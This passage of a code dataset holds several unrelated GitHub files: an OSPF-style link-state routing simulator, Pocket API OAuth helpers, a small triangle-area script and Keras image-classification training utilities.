open(\"mhcflurry_dataset.json\", 'w') as f:\n\tjson.dump(comprehensive_dataset, f)\n","repo_name":"hepengfe/aptamer-pursuit","sub_path":"archive/data/MHCFlurry_Data/parse_pseudosequences.py","file_name":"parse_pseudosequences.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18182464522","text":"# coding=utf-8\nimport threading\nimport 
socket\nimport pathlib\nimport time\nimport json\nimport argparse\nimport queue\n\nROUTE_UPDATE_INTERVAL = 30\nMAX_CONSECUTIVE_LOST_TIME = 3\nUPDATE_INTERVAL = 1\n\n\nclass NodesKnown(dict):\n    # Whether this node's own neighbour info has been updated\n    neighbour_timestamp = int(time.time())\n    # Whether the other nodes have been updated\n    nodes_timestamp = 0\n\n\ndef get_ts():\n    return time.strftime('%H:%M:%S', time.localtime(time.time()))\n\n\ndef read_config(filename):\n    file_path = pathlib.Path(filename)\n    with open(file_path) as f:\n        file_contains = f.readlines()\n    nodes = dict()\n    try:\n        # neighbour_number = int(file_contains[0].strip())\n        for line in file_contains[1:]:\n            line_e = line.strip().split()\n            if len(line_e) != 3:\n                continue\n            nodes[line_e[0]] = (float(line_e[1]), int(line_e[2]))\n    except (ValueError,):\n        print(\"config wrong\")\n        exit()\n\n    return nodes\n\n\n# target = (source_ID, source_port)\ndef sending(target, message):\n    socket_instance.sendto(\n        bytes(\n            message,\n            encoding='ascii'\n        ),\n        ('127.0.0.1', target[1])\n    )\n\n\ndef listening_thread():\n    i = 0\n    while True:\n        data, address = socket_instance.recvfrom(1024)\n        data_list = json.loads(data.decode('ascii'))\n\n        if data_list[1] == 1:\n            if data_list[0] not in NEIGHBOURS.keys():\n                print(f'[!!! ERROR !!!] Receive a broadcast not belong of neighbours')\n            i += 1\n            if i == 10:\n                # print(f'[INFO] receive LST x 10')\n                i = 0\n\n        receive_queue.put((data_list, address[1]))\n        pass\n\n\ndef dijkstra_thread():\n    while True:\n        time.sleep(ROUTE_UPDATE_INTERVAL)\n        with nodes_known_lock:\n            d = {ID: 0}\n            previous = dict()\n            S = set()\n            Q = set(nodes_known.keys())\n            while len(Q) != 0:\n                u = sorted([(q, d[q]) for q in Q if d.get(q, -1) != -1], key=lambda x: x[1])[0][0]\n                Q.remove(u)\n                S.add(u)\n                for i in nodes_known[u].items():\n                    if d.get(i[0], -1) == -1:\n                        d[i[0]] = d[u] + i[1]\n                        previous[i[0]] = u\n                    elif d[i[0]] > d[u] + i[1]:\n                        d[i[0]] = d[u] + i[1]\n                        previous[i[0]] = u\n\n            print(f'I am Router {ID}')\n            S.remove(ID)\n            for i in sorted(S):\n                u = i\n                path = []\n                while True:\n                    path.append(u)\n                    if u == ID:\n                        break\n                    u = previous[u]\n                path_string = ''.join([i for i in reversed(path)])\n                print(f'Least cost path to router {i}:{path_string} and the cost: {round(d[i],1)}')\n            sor = sorted(nodes_known.items(), key=lambda x:x[0])\n            # print(f'[Dijkstra] {sor}')\n\n\ndef broadcast_thread():\n    # default_message_for_broadcast = [\n    #     'C',\n    #     1|2|3,\n    #     123456754,\n    #     {\n    #         'A' : 4.5,\n    #         'B' : 5,\n    #         ...\n    #     }\n    # ]\n\n    # Broadcast one update packet at startup\n    update_broadcast = default_message_for_broadcast.copy()\n    update_broadcast[1] = 5\n    for i in NEIGHBOURS.items():\n        # print(f'[SEND] sending update packet {update_broadcast}')\n        send_queue.put(\n            (\n                update_broadcast,\n                (i[0], i[1][1])\n            )\n        )\n\n    while True:\n        try:\n            nodes_known_lock.acquire(True, 0.5)\n            # print(f'{nodes_known.neighbour_timestamp}')\n            neighbour = nodes_known[ID]\n            list_for_broadcast = [ID, 1, nodes_known.neighbour_timestamp, neighbour.copy()]\n            # neighbour = {\n            #     'B' : 6.5,\n            #     'F' : 2.2,\n            #     ...\n            # }\n            for nbh in neighbour.items():\n                # NEIGHBOURS = {\n                #     'B' : (6.5, 5001),\n                #     'F' : (2.2, 5005),\n                #     ...\n                # }\n\n                # send = (\n                #     [source_id, type, timestamp, data],\n                #     (source_id, source_port)\n                # )\n                send = (list_for_broadcast, (nbh[0], NEIGHBOURS[nbh[0]][1]))\n                send_queue.put(send)\n                # print(f'[Broadcast] to {neighbour}')\n        finally:\n            nodes_known_lock.release()\n\n        time.sleep(1)\n\n\ndef sending_thread():\n    broadcast_thread_instance = threading.Thread(target=broadcast_thread)\n    broadcast_thread_instance.start()\n    i = 0\n    while True:\n\n        # while broadcast_queue.empty() is 
False:\n        #     send_queue.put(broadcast_queue.get())\n        #\n        # Deadlock if without get_nowait()\n        # This part of code with get_nowait() would also raise\n        # the CPU load because there is no blocking\n        #\n        # try:\n        #     send = send_queue.get_nowait()\n        # except queue.Empty:\n        #     continue\n\n\n        # send = (\n        #     [source_id, type, timestamp, data],\n        #     (source_id, source_port)\n        # )\n\n        send = send_queue.get()\n        data_list, target = send\n\n        packet_type = data_list[1]\n        data = json.dumps(data_list, separators=(',', ':'))\n        if packet_type == 2:\n            # Create a timer\n            check_ack_thread = threading.Thread(target=check_ack, args=send)\n            sending(target, message=data)\n            # print(f'[Forward] To {target[0]}:{target[1]} {data}')\n            # Start the timer: run check() 5s after the data has been sent\n            check_ack_thread.start()\n        else:\n            if packet_type == 1:\n                # print(f'[Broadcast] {node_data[target]}:{target} {data}')\n                i += 1\n                if i == 10:\n                    # print(f'[Broadcast] {data} x 10')\n                    i = 0\n            sending(target, message=data)\n\n\n# send = (\n#     [source_id, type, timestamp, data],\n#     (source_id, source_port)\n# )\ndef check_ack(*send):\n    time.sleep(3)\n\n    packet_data_list = send[0]\n    target = send[1]\n\n    packet_source_router_name, packet_type, packet_timestamp = \\\n        packet_data_list[0], packet_data_list[1], packet_data_list[2]\n    target_router_name, target_router_port = target\n\n    try:\n        nodes_ack_lock.acquire()\n        # print(f'nodes_ack[{target_router_name}] is {success} in check_ack after used')\n        if nodes_ack.get(target_router_name, False):\n            # print(f'ACK DATABASE {nodes_ack} in check_ack')\n            return\n    finally:\n        nodes_ack[target_router_name] = False\n        nodes_ack_lock.release()\n\n    # If the node we are waiting on has already gone offline, stop retransmitting the forward packet and stop waiting for its ACK\n    try:\n        nodes_known_lock.acquire()\n        if target_router_name not in nodes_known[ID]:\n            # print(f'[Fail] To {target_router_name}:{target_router_port} has been removed from neighbour')\n            return\n    finally:\n        nodes_known_lock.release()\n\n    # print(f'[Fail] To {target_router_name}:{target_router_port} {send[0]}, try again')\n    send_queue.put(send)\n\n\ndef check_alive():\n    # nodes_heartbeat = {\n    #     'A' : 1,\n    #     'B' : 2,\n    #     .....\n    # }\n\n    # nodes_known = {\n    #     'B' : {\n    #         'F' : 2.2,\n    #     },\n    #     'F' : {\n    #         'B' : 2.2,\n    #         'A' : 4,\n    #         ...\n    #     },\n    #     ...\n    # }\n\n    while True:\n        lost_node = []\n        with nodes_known_lock:\n            with nodes_heartbeat_lock:\n                for n in nodes_known[ID].keys():\n                    if nodes_heartbeat.setdefault(n, 0) >= MAX_CONSECUTIVE_LOST_TIME:\n                        lost_node.append(n)\n                    else:\n                        nodes_heartbeat[n] += 1\n\n            if len(lost_node) != 0:\n                # print(f'[LOST] {lost_node} {time.time()}')\n                # print(f'{nodes_known}')\n                for n in lost_node:\n                    # print(f'[DELETE] nodes_known[{ID}][{n}]: {nodes_known[ID][n]}')\n                    # print(f'{nodes_known[ID].pop(n)}')\n                    del nodes_known[ID][n]\n                    # print(f'[DELETE] nodes_known[{ID}][{n}]OK')\n                    if n in nodes_known.keys():\n                        del nodes_known[n]\n                        # print(f'[DELETE] nodes_known[{n}]OK')\n                    with packet_update_time_lock:\n                        offline_packet_list = [n, 1, packet_update_time.get(n, 0)+1, {}]\n                        receive_queue.put((offline_packet_list, NEIGHBOURS[n][1]))\n                        # print(f'[Receive] offline packet from {n}: {offline_packet_list}')\n                nodes_known.nodes_timestamp = nodes_known.neighbour_timestamp = int(time.time())\n\n        time.sleep(UPDATE_INTERVAL)\n\n\n# For avoiding deadlock, order Locks:\n# 1 nodes_ack_lock\n# 2 nodes_known_lock\n# 3 packet_update_time_lock\n# 4 nodes_heartbeat_lock\ndef main_thread():\n    while True:\n        receive = receive_queue.get()\n        receive_data_list, packet_receive_from_port = receive[0], receive[1]\n        packet_source_router, packet_type, packet_timestamp = \\\n            
receive_data_list[0], receive_data_list[1], receive_data_list[2]\n\n        # Heartbeat packet\n        if packet_type == 1:\n            with nodes_heartbeat_lock:\n                nodes_heartbeat[packet_source_router] = 0\n                # print(f'[RETENTION] nodes_heartbeat[{packet_source_router}] == 0')\n\n        if packet_type not in {1, 2, 3, 4, 5}:\n            # print(f'I don\\'t know what\\'s the meaning of packet!!!!')\n            continue\n\n        if packet_type == 3:\n            # print(f'[ACK] From {node_data[packet_receive_from_port]}: {packet_receive_from_port}')\n            with nodes_ack_lock:\n                nodes_ack[packet_source_router] = True\n                # print(f'SET nodes_ack[{packet_source_router}] to True')\n                # print(f'ACK DATABASE {nodes_ack}')\n            continue\n\n        # A host has come back online\n        if packet_type == 5:\n            node_cost = receive_data_list[3]\n            # Reset the forwarding timestamps to tell the surrounding hosts to include this node when forwarding\n            with nodes_known_lock, packet_update_time_lock:\n                for p in packet_update_time.keys():\n                    if len(p) == 2 and p[1] == packet_source_router:\n                        packet_update_time[p] = 0\n                try:\n                    nodes_known[ID][packet_source_router] = node_cost[ID]\n                    nodes_known.neighbour_timestamp = int(time.time())\n                except KeyError:\n                    print(f'The packet has no cost from the source address to this node')\n            continue\n\n        # If it is a forwarded packet, reply with an ACK\n        if packet_type == 2:\n            # print(f'[RECEIVE] Forwarded packet from {node_data[packet_receive_from_port]}:{packet_receive_from_port} '\n            #       f'{receive_data_list} {time.time()}')\n\n            # ????\n            # send_queue.put(([ID, 3, receive_data_list[2]], packet_receive_from_port))\n            # print(f'[SEND] ACK to {node_data[packet_receive_from_port]}:{packet_receive_from_port} ')\n            send_queue.put(([ID, 3, packet_timestamp], (receive_data_list[0], packet_receive_from_port)))\n\n        # print(f'[RECEIVE] Broadcast packet from {node_data[packet_receive_from_port]}:{packet_receive_from_port} '\n        #       f'{receive_data_list}')\n        with nodes_known_lock, packet_update_time_lock:\n            node_cost = receive_data_list[3]\n            last_update_time = packet_update_time.get(packet_source_router, 0)\n            # print(f'[RECEIVE] from {packet_source_router}:{receive_data_list}, old: {last_update_time}')\n            # print(f'recorded timestamp {packet_source_router} to self: {last_update_time}')\n            # print(f'packet timestamp {packet_source_router} to self: {packet_timestamp}')\n\n            # The received packet's timestamp is newer than the locally recorded one, which means:\n            # 1. the source host came back online, or\n            # 2. the source host has updated its contents\n\n            if last_update_time < packet_timestamp:\n                packet_update_time[packet_source_router] = packet_timestamp\n                # print(f'[INFO] {nodes_known.nodes_timestamp}: {nodes_known}')\n                # Update\n                # node_cost = {\n                #     'A': 6.3,\n                #     'C': 7.4,\n                #     ...\n                # }\n                # Update the contents from the source host to this node\n                # print(f'node_cost: {node_cost}')\n                if len(node_cost) != 0:\n                    nodes_known[packet_source_router] = node_cost\n\n                # A receives B's packet {'C': 5, 'E':8}, meaning B can reach C and D, and C, D can reach B\n                # The fact that C and D can reach B will arrive sooner or later via packet forwarding\n                # for i in node_cost.items():\n                #     nodes_known.setdefault(i[0], dict())[packet_source_router] = i[1]\n\n                nodes_known.nodes_timestamp = int(time.time())\n                # print(f'[UPDATE] Know {nodes_known}')\n            elif packet_source_router in nodes_known.keys():\n                del nodes_known[packet_source_router]\n                # print(f'[DELETE] nodes_known[{packet_source_router}]OK')\n                nodes_known.nodes_timestamp = int(time.time())\n\n            for n in nodes_known[ID].items():\n                target_router_name = n[0]\n                # Do not forward back to the original author of the message\n                if target_router_name == packet_source_router:\n                    continue\n\n                target_router_port = NEIGHBOURS[target_router_name][1]\n\n                # Do not forward back to the sender\n                if target_router_port == packet_receive_from_port:\n                    continue\n\n                # If the received timestamp is old or equal, compare it against each one\n                if last_update_time >= packet_timestamp:\n                    # print(f'last_update_time >= packet_timestamp')\n                    last_update_time_s_to_t = packet_update_time.get((packet_source_router, target_router_name), 0)\n                    # 
print(f'recorded timestamp {packet_source_router} to {target_router}: {last_update_time_s_to_t}')\n                    if last_update_time_s_to_t >= packet_timestamp:\n                        # print(f'last_update_time_s_to_t >= packet_timestamp')\n                        continue\n\n                receive_data_list[1] = 2\n\n                packet_update_time[(packet_source_router, target_router_name)] = packet_timestamp\n                # print(f'[UPDATE] Forward packet from {packet_source_router} to {target_router_name}, '\n                #       f'old: {last_update_time}, new: {packet_timestamp}')\n\n                # print(f'[Forward] To {target_router_name}:{target_router_port} {receive_data_list}')\n                send_queue.put((receive_data_list, (target_router_name, target_router_port)))\n\n\n        # print(get_ts() + ': '\n        #       f'receive data from {receive_data_list[0][0]}, type {receive_data_list[0][1]}, '\n        #       f'timestamp {receive_data_list[0][2]}: {receive_data_list[0][3]}')\n\n\nap = argparse.ArgumentParser(description='Assignment of COMP9331\\n author: Shichao ZHANG (z5178127)')\nap.add_argument('id', metavar='ID')\nap.add_argument('port', metavar='PORT')\nap.add_argument('config', metavar='CONFIG')\nargs = ap.parse_args()\n\n\nPORT = args.port\ntry:\n    PORT = int(PORT)\n    if PORT < 0 or PORT > 65535:\n        raise ValueError\nexcept (ValueError, TypeError):\n    print('PORT is incorrect')\n\nID = args.id\nCONFIG = args.config\n\nsocket_instance = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\nsocket_instance.bind(('0.0.0.0', PORT))\n\n# NEIGHBOURS = {\n#     'B' : (6.5, 5001),\n#     'F' : (2.2, 5005),\n#     ...\n# }\n\n# nodes_known = {\n#     'B' : {\n#         'F' : 2.2,\n#     },\n#     'F' : {\n#         'B' : 2.2,\n#         'A' : 4,\n#         ...\n#     },\n#     ...\n# }\n\nNEIGHBOURS = read_config(CONFIG)\n\nnodes_known = NodesKnown()\nnodes_known_lock = threading.Lock()\n\nnodes_known[ID] = dict()\nfor n in NEIGHBOURS.items():\n    # n[0]: node_ID\n    # n[1][0]: cost\n    nodes_known[ID][n[0]] = n[1][0]\n    nodes_known[n[0]] = {ID: n[1][0]}\n\nnodes_known.neighbour_timestamp = int(time.time())\ndefault_message_for_broadcast = [ID, 1, nodes_known.neighbour_timestamp, nodes_known[ID].copy()]\n\n# +-------------------------------------------+\n# | SOURCE ID | TYPE | TIMESTAMP | STATE DATA |\n# +-------------------------------------------+\n# TYPE:\n# 1: own broadcast packet, no acknowledgement needed\n# 2: broadcast packet forwarded for another node, must be acknowledged because it is broadcast only once\n# 3: acknowledgement packet\n# 5: back-online broadcast packet\n\n# message_for_broadcast = json.dumps([ID, 1, int(time.time()), NEIGHBOURS])\n# message_for_broadcast = json.dumps([ID, 1, int(time.time()), nodes_known[ID]])\n\npacket_update_time = dict()\npacket_update_time_lock = threading.Lock()\n\nnodes_ack = dict()\nnodes_ack_lock = threading.Lock()\n\nnodes_heartbeat = dict()\nnodes_heartbeat_lock = threading.Lock()\n\nreceive_queue = queue.Queue()\nsend_queue = queue.Queue()\nbroadcast_queue = queue.Queue()\n\n# print(f'[INFO] Router: {ID}')\n# print(f'[INFO] Config: {NEIGHBOURS}')\n# print(f'[INFO] {nodes_known.neighbour_timestamp}: {nodes_known}')\n\n\nt1 = threading.Thread(target=sending_thread)\nt2 = threading.Thread(target=listening_thread)\nt3 = threading.Thread(target=main_thread)\nt4 = threading.Thread(target=check_alive)\nt5 = threading.Thread(target=dijkstra_thread)\n\nt1.start()\nt2.start()\nt3.start()\nt4.start()\nt5.start()\n","repo_name":"firedent/OSPF_simulation","sub_path":"Lsr.py","file_name":"Lsr.py","file_ext":"py","file_size_in_byte":17705,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"37103962135","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Pocket specific utils \"\"\"\n\nimport logging\nimport requests\n\nimport poku.exceptions\n\n\ndef 
get_request_token(consumer_key):\n    \"\"\" get request token from api \"\"\"\n    data = {'consumer_key': consumer_key, 'redirect_uri': 'getpocket.com'}\n    headers = {'x-accept': 'application/json'}\n    r = requests.post('https://getpocket.com/v3/oauth/request',\n                      data=data, headers=headers)\n\n    if r.ok:\n        request_token = r.json()['code']\n        logging.info(f'Request token retrieved successfully: {request_token}')\n        return request_token\n    else:\n        exception_msg = 'An error occurred while requesting request token'\n        raise poku.exceptions.PocketGetRequestTokenException(exception_msg)\n\n\ndef generate_auth_url(request_token):\n    \"\"\" return auth url for user to authorize application \"\"\"\n    url = ('https://getpocket.com/auth/authorize'\n           f'?request_token={request_token}'\n           '&redirect_uri=https://getpocket.com')\n\n    return url\n\n\ndef get_access_token(consumer_key, request_token):\n    \"\"\" get access token from api \"\"\"\n    data = {'consumer_key': consumer_key, 'code': request_token}\n    headers = {'x-accept': 'application/json'}\n    r = requests.post('https://getpocket.com/v3/oauth/authorize',\n                      data=data, headers=headers)\n\n    if r.ok:\n        access_token = r.json()['access_token']\n        logging.info(f'Access token retrieved successfully: {access_token}')\n        return access_token\n    else:\n        exception_msg = 'An error occurred while requesting access token'\n        raise poku.exceptions.PocketGetAccessTokenException(exception_msg)\n\n\ndef get_items(consumer_key, access_token):\n    \"\"\" get a list of pocket items from api \"\"\"\n    data = {\n        'consumer_key': consumer_key,\n        'access_token': access_token,\n        'detailType': 'complete'\n    }\n    r = requests.post('https://getpocket.com/v3/get', data=data)\n\n    if r.ok:\n        pocket_items = [i for i in r.json()['list'].values()]\n        logging.info(f'{len(pocket_items)} pocket items retrieved')\n        return pocket_items\n    else:\n        exception_msg = 'An error occurred while retrieving pocket items'\n        raise poku.exceptions.PocketGetItemsException(exception_msg)\n\n\ndef item_to_dict(p_item):\n    \"\"\" convert pocket item to universal dict \"\"\"\n    out = {\n        'url': p_item.get('resolved_url') or p_item.get('given_url'),\n        'title': p_item.get('resolved_title') or p_item.get('given_title'),\n        'tags': sorted(p_item.get('tags', {}).keys()),\n        'timestamp': int(p_item.get('time_added'))\n    }\n\n    return out\n","repo_name":"surskitt/poku","sub_path":"poku/pocket.py","file_name":"pocket.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"53"} +{"seq_id":"38508962634","text":"#2 design an app with a function that computes the area of a triangle and is then called by an algorithm\n\n#FUNCTION: AREA OF A TRIANGLE\ndef triangulo():\n    area=(b*h)/2\n    print(\"The area of the triangle is: \",area)\n\n\n#algorithm to call the function\n#app: area of the triangle\n\nb=float(input(\"Enter the base of the triangle: \"))\nh=float(input(\"Enter the height of the triangle: \"))\n\ntriangulo()","repo_name":"MartinezT-Omar/MartinezT-Omar.github.io","sub_path":"PYTHON/Funciones/proyecto6.py","file_name":"proyecto6.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16109964784","text":"import os\nimport random\nimport imageio\nimport glob\nimport datetime\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom IPython.display import display_markdown\n\nimport tensorflow as tf\nfrom 
tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications import ResNet50, EfficientNetB0\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Rescaling, CenterCrop\nfrom tensorflow.keras.utils import Sequence, to_categorical, plot_model\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom sklearn.utils import class_weight\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nfrom tqdm.keras import TqdmCallback\nimport tensorflow_addons as tfa\n\nfrom keras import layers\nfrom keras import models\nfrom keras.models import Model\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, precision_score, recall_score, accuracy_score\n\nimport io\nimport cv2\ndef resize_img_aspect(image, new_height=512):\n height, width, _ = image.shape\n ratio = width / height\n\n new_width = int(ratio * new_height)\n\n image = cv2.resize(image, (new_width, new_height))\n return image\n \ndef fig_to_img(fig):\n buf = io.BytesIO()\n plt.savefig(buf, format='png', bbox_inches='tight')\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=3).numpy() \n return image\n\n# Function to get paths from private directory\ndef get_files(base_dir, resolution=None, exclude_pd=False):\n resolution = resolution if resolution != 'public' else None\n ext = ['jpg', 'jpeg']\n ret_files = []\n\n for f in glob.glob(f'{base_dir}/**', recursive=True):\n if not any([f.endswith(e) for e in ext]):\n continue\n if (resolution is not None) and (f'_{resolution}' not in f):\n continue\n if (exclude_pd) and ('_pd' in f):\n continue\n ret_files.append(f)\n \n return ret_files\n\ndef get_classes_labels(root_directory, image_paths, class_type, exclude_pd=False):\n if class_type == 'micro':\n class_names = sorted([f for f in os.listdir(root_directory) if not f.startswith('.')])\n else:\n class_names = sorted(list(set([f if '_' not in f else f.split('_')[0] for f in os.listdir(root_directory) if not f.startswith('.')])))\n \n class_names = class_names if not exclude_pd else [c for c in class_names if '_pd' not in c]\n\n class2int = dict(zip(class_names, range(len(class_names))))\n labels = list(map(lambda im: class2int[im.split(root_directory)[1].split('/')[0]] if class_type=='micro' else class2int[im.split(root_directory)[1].split('/')[0].split('_')[0]], image_paths))\n \n return class_names, class2int, labels\n \n\nclass CustomDataGenerator(Sequence):\n def __init__(self, images, labels, num_classes, batch_size=8, image_size=255, \n shuffle_epoch=True, mode='train'):\n \n assert mode in ['train', 'val']\n assert batch_size%4 == 0\n \n self.num_classes = num_classes\n self.images = images\n self.labels = labels\n self.batch_size = batch_size\n self.image_size = image_size\n self.shuffle_epoch = shuffle_epoch\n self.mode = mode \n \n def __len__(self):\n if self.mode == 'train':\n return int(np.ceil(len(self.images) / self.batch_size))\n return int(np.ceil(len(self.images)*4 / self.batch_size))\n \n def __getitem__(self, idx):\n \n if (idx == 0) and (self.shuffle_epoch): \n # Shuffle at first batch\n c = list(zip(self.images, self.labels))\n random.shuffle(c)\n self.images, self.labels = zip(*c)\n self.images, self.labels = np.array(self.images), np.array(self.labels) \n \n bs = self.batch_size if self.mode == 'train' else self.batch_size//4\n images = self.images[idx * bs : 
(idx+1) * bs]\n labels = self.labels[idx * bs : (idx+1) * bs]\n \n # Read images\n images = np.array([imageio.v2.imread(im) for im in images])\n images = images/255\n \n if self.mode == 'train':\n # Choose one of the four quadrants\n x, y = np.random.choice([0,1], size=2)\n images = images[:,(x*600):(x*600 + 600), (y*800):(y*800 + 800)]\n\n images = np.array([self.random_crop(im) for im in images])\n labels = to_categorical(labels, num_classes=self.num_classes)\n\n return images, labels\n \n new_images, new_labels = [], []\n for x in range(2):\n for y in range(2):\n new_images.append(images[:,(x*600):(x*600 + 600), (y*800):(y*800 + 800)])\n new_labels.append(to_categorical(labels, num_classes=self.num_classes))\n\n #indexes = [i for j in range(4) for i in range(j, len(images) * 4, 4)]\n indexes = list(range(0,len(images)*4,2)) + list(range(1,len(images)*4,2))\n #print(indexes)\n new_images = np.concatenate(new_images)[indexes]\n new_labels = np.concatenate(new_labels)[indexes]\n \n # from ZGlobalLib.visualization import plot_frames\n # plot_frames(images)\n \n new_images = tf.image.resize(new_images, (300, 400)).numpy()\n new_images = CenterCrop(self.image_size, self.image_size)(new_images).numpy()\n \n return new_images, new_labels\n \n \n def random_crop(self, image):\n image = tf.image.resize(image, (300, 400)).numpy()\n cropped_image = tf.image.random_crop(image, size=[self.image_size, self.image_size, 3]).numpy()\n return cropped_image\n \n \n def show_generator(self, N=12): \n g0 = self[0]\n N = min(N, len(g0[0]))\n fig, axs = plt.subplots(1,N, figsize=(20,4))\n for i in range(N):\n axs[i].imshow(g0[0][i])\n axs[i].axis('off')\n axs[i].set_title(g0[1][i])\n \n\nclass PublicDataGenerator(Sequence):\n def __init__(self, images, labels, num_classes, batch_size=8, image_size=255, \n shuffle_epoch=True, mode='train'):\n \n self.num_classes = num_classes\n self.images = images\n self.labels = labels\n self.batch_size = batch_size*4\n self.image_size = image_size\n self.shuffle_epoch = shuffle_epoch\n \n def __len__(self):\n return int(np.ceil(len(self.images) / self.batch_size))\n \n def __getitem__(self, idx):\n \n if (idx == 0) and (self.shuffle_epoch): \n # Shuffle at first batch\n c = list(zip(self.images, self.labels))\n random.shuffle(c)\n self.images, self.labels = zip(*c)\n self.images, self.labels = np.array(self.images), np.array(self.labels) \n \n bs = self.batch_size\n images = self.images[idx * bs : (idx+1) * bs]\n labels = self.labels[idx * bs : (idx+1) * bs]\n \n # Read images\n images = np.array([imageio.v2.imread(im) for im in images])\n images = images/255\n \n images = np.array([self.random_crop(im) for im in images])\n labels = to_categorical(labels, num_classes=self.num_classes)\n\n return images, labels\n \n \n def random_crop(self, image):\n # cropped_image = tf.image.random_crop(image, size=[self.image_size, self.image_size, 3]).numpy()\n cropped_image = tf.image.resize(image, (256, 256)).numpy()\n return cropped_image\n \n \n def show_generator(self, N=12): \n g0 = self[0]\n N = min(N, len(g0[0]))\n fig, axs = plt.subplots(1,N, figsize=(20,4))\n for i in range(N):\n axs[i].imshow(g0[0][i])\n axs[i].axis('off')\n axs[i].set_title(g0[1][i])\n \n \ndef get_generators(image_paths, labels, num_classes, resolution, test_size=0.15, batch_size=8, random_state=42):\n #Split in training and validation\n train_paths, val_paths, train_labels, val_labels = train_test_split(image_paths, labels, test_size=test_size, random_state=42)\n \n #Build the generators\n if resolution == 
'public':\n train_generator = PublicDataGenerator(train_paths, train_labels, num_classes=num_classes, batch_size=batch_size)\n val_generator = PublicDataGenerator(val_paths, val_labels, num_classes=num_classes, shuffle_epoch=False, batch_size=batch_size)\n else: \n train_generator = CustomDataGenerator(train_paths, train_labels, num_classes=num_classes, batch_size=batch_size)\n val_generator = CustomDataGenerator(val_paths, val_labels, num_classes=num_classes, shuffle_epoch=False, mode='val', batch_size=batch_size)\n \n return train_generator, val_generator\n\n\ndef compute_weights(train_generator):\n labels = np.concatenate([l.argmax(1) for _, l in tqdm(train_generator, leave=False)])\n class_weights = class_weight.compute_class_weight('balanced',\n classes=np.unique(labels),\n y=list(labels))\n class_weights = dict(enumerate(class_weights))\n return class_weights\n\n\n\ndef simple_model(num_classes, resolution):\n entradas = layers.Input((255, 255, 3))\n\n # Two convolutional layers with 16 filters each\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(entradas)\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(x)\n x = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(x)\n\n x = layers.GlobalAveragePooling2D()(x)\n\n # Dense layer with 1280 units\n x = layers.Dense(32, activation='relu')(x)\n\n # Output layer\n output_tensor = layers.Dense(num_classes, activation='softmax')(x)\n\n model = Model(inputs=entradas, outputs=output_tensor)\n return model\n\n \ndef get_model(num_classes, resolution):\n \n #return simple_model(num_classes, resolution)\n \n base_model = EfficientNetB0(include_top = False, weights='imagenet', pooling='avg')\n # base_model = EfficientNetB0(include_top = False, weights=None, pooling='avg')\n\n # Introduce a layer of data augmentation\n data_augmentation = Sequential([\n preprocessing.RandomRotation(0.2),\n preprocessing.RandomFlip(\"horizontal\"),\n preprocessing.RandomFlip(\"vertical\"),\n preprocessing.RandomZoom(0.2),\n preprocessing.RandomTranslation(0.2, 0.2),\n preprocessing.RandomHeight(0.2),\n preprocessing.RandomWidth(0.2), \n preprocessing.RandomContrast(0.2),\n\n ]) if resolution != 'public' else Sequential([])\n\n data_augmentation = Sequential([])\n # # Freeze all layers in the base model\n # for layer in base_model.layers:\n # layer.trainable = False\n # # Unfreeze the last 10 layers in the base model for fine-tuning\n # for layer in base_model.layers[-5:]:\n # layer.trainable = True\n\n #capa de entradas. 
\n entradas = layers.Input((255, 255, 3))\n\n # Augmentation layer\n x = data_augmentation(entradas)\n # Pass the augmented images through the base model\n x = base_model(x)\n # Add a dense layer\n x = layers.Dense(512, activation='relu')(x)\n # Output layer\n salidas = layers.Dense(num_classes, activation='softmax')(x)\n model1 = Model(inputs = entradas, outputs = salidas)\n \n return model1\n\n\ndef train_model(model, train_generator, val_generator, num_classes, class_weights, log_dir):\n num_epochs = 200\n patience = 40\n patience_lr = 20\n \n init_lr = 1e-4\n\n model.compile(optimizer=tf.keras.optimizers.Adam(init_lr), \n loss='categorical_crossentropy', \n metrics=[\n tf.keras.metrics.CategoricalAccuracy(name=f'metrics/accuracy'),\n tf.keras.metrics.TopKCategoricalAccuracy(3, name=f'metrics/top-3-accuracy'),\n tfa.metrics.F1Score(num_classes=num_classes, average='macro', name='metrics/F1-macro'),\n tf.keras.metrics.AUC(multi_label=True, num_labels=num_classes, name='metrics/AUC'),\n tf.keras.metrics.Precision(name='metrics/precision'),\n tf.keras.metrics.Recall(name='metrics/recall'),\n tf.keras.metrics.PrecisionAtRecall(0.99, name='metrics/P@R_99'),\n tf.keras.metrics.PrecisionAtRecall(0.95, name='metrics/P@R_95'),\n tf.keras.metrics.PrecisionAtRecall(0.9, name='metrics/P@R_90'),\n tfa.metrics.MatthewsCorrelationCoefficient(num_classes=num_classes, name='metrics/MCC')\n ],\n )\n\n callbacks =[\n EarlyStopping(monitor='val_loss', restore_best_weights=False, patience=patience),\n ReduceLROnPlateau(monitor='val_loss', patience=patience_lr, min_lr=1e-7), \n ModelCheckpoint(log_dir, monitor=f\"val_loss\", save_best_only=True, save_weights_only=True),\n TqdmCallback(leave=False),\n TensorBoard(log_dir=log_dir, histogram_freq=1, profile_batch=0)\n\n ]\n \n history = model.fit(train_generator, epochs=num_epochs, verbose=0, callbacks=callbacks, validation_data=val_generator,class_weight=class_weights)\n \n model.load_weights(log_dir)\n \n return history\n\n#function to plot the metrics of 